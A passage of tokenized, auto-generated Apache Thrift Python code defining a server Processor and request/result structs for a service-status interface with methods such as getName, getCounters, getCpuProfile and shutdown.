"<STR_LIT>" ] = Processor . process_getStatusDetails <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getCounters <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getCounter <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_setOption <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getOption <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getOptions <EOL> self . 
_processMap [ "<STR_LIT>" ] = Processor . process_getCpuProfile <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_aliveSince <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_reinitialize <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_shutdown <EOL> def process ( self , iprot , oprot ) : <EOL> ( name , type , seqid ) = iprot . readMessageBegin ( ) <EOL> if name not in self . _processMap : <EOL> iprot . skip ( TType . STRUCT ) <EOL> iprot . readMessageEnd ( ) <EOL> x = TApplicationException ( TApplicationException . UNKNOWN_METHOD , '<STR_LIT>' % ( name ) ) <EOL> oprot . writeMessageBegin ( name , TMessageType . EXCEPTION , seqid ) <EOL> x . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> return <EOL> else : <EOL> self . _processMap [ name ] ( self , seqid , iprot , oprot ) <EOL> return True <EOL> def process_getName ( self , seqid , iprot , oprot ) : <EOL> args = getName_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getName_result ( ) <EOL> result . success = self . _handler . getName ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getVersion ( self , seqid , iprot , oprot ) : <EOL> args = getVersion_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getVersion_result ( ) <EOL> result . success = self . _handler . getVersion ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getStatus ( self , seqid , iprot , oprot ) : <EOL> args = getStatus_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getStatus_result ( ) <EOL> result . success = self . _handler . getStatus ( ) <EOL> oprot . 
writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getStatusDetails ( self , seqid , iprot , oprot ) : <EOL> args = getStatusDetails_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getStatusDetails_result ( ) <EOL> result . success = self . _handler . getStatusDetails ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getCounters ( self , seqid , iprot , oprot ) : <EOL> args = getCounters_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getCounters_result ( ) <EOL> result . success = self . _handler . getCounters ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getCounter ( self , seqid , iprot , oprot ) : <EOL> args = getCounter_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getCounter_result ( ) <EOL> result . success = self . _handler . getCounter ( args . key ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_setOption ( self , seqid , iprot , oprot ) : <EOL> args = setOption_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = setOption_result ( ) <EOL> self . _handler . setOption ( args . key , args . value ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . 
flush ( ) <EOL> def process_getOption ( self , seqid , iprot , oprot ) : <EOL> args = getOption_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getOption_result ( ) <EOL> result . success = self . _handler . getOption ( args . key ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getOptions ( self , seqid , iprot , oprot ) : <EOL> args = getOptions_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getOptions_result ( ) <EOL> result . success = self . _handler . getOptions ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getCpuProfile ( self , seqid , iprot , oprot ) : <EOL> args = getCpuProfile_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getCpuProfile_result ( ) <EOL> result . success = self . _handler . getCpuProfile ( args . profileDurationInSec ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_aliveSince ( self , seqid , iprot , oprot ) : <EOL> args = aliveSince_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = aliveSince_result ( ) <EOL> result . success = self . _handler . aliveSince ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_reinitialize ( self , seqid , iprot , oprot ) : <EOL> args = reinitialize_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . 
reinitialize ( ) <EOL> return <EOL> def process_shutdown ( self , seqid , iprot , oprot ) : <EOL> args = shutdown_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . shutdown ( ) <EOL> return <EOL> class getName_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getName_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . 
STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . 
__dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getVersion_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getVersion_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . 
TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatus_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . 
CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatus_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . I32 , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . 
readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . I32 : <EOL> self . success = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . I32 , <NUM_LIT:0> ) <EOL> oprot . writeI32 ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatusDetails_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . 
readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatusDetails_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . 
skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounters_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . 
thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounters_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . MAP , '<STR_LIT:success>' , ( TType . STRING , None , TType . I64 , None ) , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . MAP : <EOL> self . success = { } <EOL> ( _ktype1 , _vtype2 , _size0 ) = iprot . readMapBegin ( ) <EOL> for _i4 in xrange ( _size0 ) : <EOL> _key5 = iprot . readString ( ) ; <EOL> _val6 = iprot . readI64 ( ) ; <EOL> self . success [ _key5 ] = _val6 <EOL> iprot . readMapEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . 
readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . MAP , <NUM_LIT:0> ) <EOL> oprot . writeMapBegin ( TType . STRING , TType . I64 , len ( self . success ) ) <EOL> for kiter7 , viter8 in self . success . items ( ) : <EOL> oprot . writeString ( kiter7 ) <EOL> oprot . writeI64 ( viter8 ) <EOL> oprot . writeMapEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounter_args : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , key = None , ) : <EOL> self . key = key <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . 
readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getCounter_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . I64 , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . 
trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . I64 : <EOL> self . success = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . I64 , <NUM_LIT:0> ) <EOL> oprot . writeI64 ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ 